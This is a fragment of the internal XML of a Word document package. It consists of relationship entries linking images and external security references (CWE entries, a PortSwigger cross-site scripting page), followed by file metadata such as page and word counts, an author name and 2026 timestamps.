Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/200.html" TargetMode="External"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cwe.mitre.org/data/definitions/269.html" TargetMode="External"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId78" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image51.png"/><Relationship Id="rId99" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image56.png"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image58.png"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image79.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1.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/cross-site-scripting" TargetMode="External"/><Relationship Id="rId68" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId89" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image69.png"/><Relationship Id="rId133"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47B16-637C-4672-A290-6382BE72E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1634</TotalTime>
  <Pages>111</Pages>
  <Words>22086</Words>
  <Characters>125893</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>1049</Lines>
  <Paragraphs>295</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>147684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Zain Din Muhammed</cp:lastModifiedBy>
  <cp:revision>47</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-04T09:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-09T08:48:00Z</dcterms:modified>
</cp:coreProperties>
</file>